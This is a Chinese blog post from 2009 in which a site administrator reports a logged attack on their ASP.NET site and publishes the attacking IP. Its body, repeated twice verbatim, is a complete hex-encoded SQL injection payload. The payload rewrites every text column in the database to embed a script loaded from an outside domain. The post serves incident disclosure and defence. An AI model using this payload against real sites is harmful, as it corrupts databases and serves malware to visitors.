遭遇网页挂马(再续)-- 监测到攻击方法了!
2009-07-07 19:49
302 查看
通过前一段时间的努力,对用户输入的信息进行了过滤和监控,今天,看到监控日志中有如下的记录:
http://www.xxxxxx.com/showimages.aspx?id=16;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C006100720065002000400054002000560061007200630068
0061007200280032003500350029002C004000430020005600610072006300680061
0072002800320035003500290020004400650063006C006100720065002000540061
0062006C0065005F0043007500720073006F007200200043007500720073006F00720
0200046006F0072002000530065006C00650063007400200041002E004E0061006D0
065002C0042002E004E0061006D0065002000460072006F006D00200053007900730
06F0062006A006500630074007300200041002C0053007900730063006F006C007500
6D006E00730020004200200057006800650072006500200041002E00490064003D00
42002E0049006400200041006E006400200041002E00580074007900700065003D00
270075002700200041006E0064002000280042002E00580074007900700065003D00
3900390020004F007200200042002E00580074007900700065003D003300350020004
F007200200042002E00580074007900700065003D0032003300310020004F00720020
0042002E00580074007900700065003D00310036003700290020004F00700065006E0
020005400610062006C0065005F0043007500720073006F0072002000460065007400
6300680020004E006500780074002000460072006F006D00200020005400610062006
C0065005F0043007500720073006F007200200049006E0074006F002000400054002C
004000430020005700680069006C006500280040004000460065007400630068005F0
05300740061007400750073003D0030002900200042006500670069006E0020004500
7800650063002800270075007000640061007400650020005B0027002B00400054002
B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052
007400720069006D00280043006F006E0076006500720074002800560061007200630
06800610072002800380030003000300029002C005B0027002B00400043002B0027005
D00290029002B00270027003C0073006300720069007000740020007300720063003D
0068007400740070003A002F002F003300620033002E006F00720067002F0063002E00
6A0073003E003C002F007300630072006900700074003E002700270027002900460065
0074006300680020004E006500780074002000460072006F006D002000200054006100
62006C0065005F0043007500720073006F007200200049006E0074006F002000400054
002C0040004300200045006E006400200043006C006F00730065002000540061006200
6C0065005F0043007500720073006F00720020004400650061006C006C006F00630061
007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);
为安全起见,我隐去了网站的名字。
正在找工具,看能不能把上在的十六进制转成字符串。
同时公布一下攻击 IP:64.56.69.218
http://www.xxxxxx.com/showimages.aspx?id=16;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C006100720065002000400054002000560061007200630068
0061007200280032003500350029002C004000430020005600610072006300680061
0072002800320035003500290020004400650063006C006100720065002000540061
0062006C0065005F0043007500720073006F007200200043007500720073006F00720
0200046006F0072002000530065006C00650063007400200041002E004E0061006D0
065002C0042002E004E0061006D0065002000460072006F006D00200053007900730
06F0062006A006500630074007300200041002C0053007900730063006F006C007500
6D006E00730020004200200057006800650072006500200041002E00490064003D00
42002E0049006400200041006E006400200041002E00580074007900700065003D00
270075002700200041006E0064002000280042002E00580074007900700065003D00
3900390020004F007200200042002E00580074007900700065003D003300350020004
F007200200042002E00580074007900700065003D0032003300310020004F00720020
0042002E00580074007900700065003D00310036003700290020004F00700065006E0
020005400610062006C0065005F0043007500720073006F0072002000460065007400
6300680020004E006500780074002000460072006F006D00200020005400610062006
C0065005F0043007500720073006F007200200049006E0074006F002000400054002C
004000430020005700680069006C006500280040004000460065007400630068005F0
05300740061007400750073003D0030002900200042006500670069006E0020004500
7800650063002800270075007000640061007400650020005B0027002B00400054002
B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052
007400720069006D00280043006F006E0076006500720074002800560061007200630
06800610072002800380030003000300029002C005B0027002B00400043002B0027005
D00290029002B00270027003C0073006300720069007000740020007300720063003D
0068007400740070003A002F002F003300620033002E006F00720067002F0063002E00
6A0073003E003C002F007300630072006900700074003E002700270027002900460065
0074006300680020004E006500780074002000460072006F006D002000200054006100
62006C0065005F0043007500720073006F007200200049006E0074006F002000400054
002C0040004300200045006E006400200043006C006F00730065002000540061006200
6C0065005F0043007500720073006F00720020004400650061006C006C006F00630061
007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);
为安全起见,我隐去了网站的名字。
正在找工具,看能不能把上在的十六进制转成字符串。
同时公布一下攻击 IP:64.56.69.218
相关文章推荐
- 遭遇网页挂马(第四) -- 解析攻击方法
- 局域网遭遇ARP欺骗攻击的解决方法
- 在网页中挂马和清除木马的方法
- 防范网页挂马攻击 从对WEB站点进行安全评估开始
- 遭遇网页挂马,数据库挂马并手刃之过程
- 遭遇网页挂马(第五) ―― 基于不信任的请求验证
- 遭遇网页挂马(续)
- 网页前端常见的攻击方式和预防攻击的方法
- 遭遇网页挂马,数据库挂马并手刃之过程
- 遭遇网页挂马
- 网页前端常见的攻击方式和预防攻击的方法
- IIS服务器静态网页被挂马和解决方法(ZT)
- 网页前端常见的攻击方式和预防攻击的方法
- 交换机攻击技术进一步利用----实现网页挂马
- 遭遇网页挂马(第六) ―― 数据库挂马应急处理
- ajax 操作全局监测,用户session失效的解决方法
- java 防止 XSS 攻击的常用方法
- 网页出现乱码的问题解决方法:检查4个部分
- python打开url并按指定块读取网页内容的方法
- 遭遇一次MySQL猜解注入攻击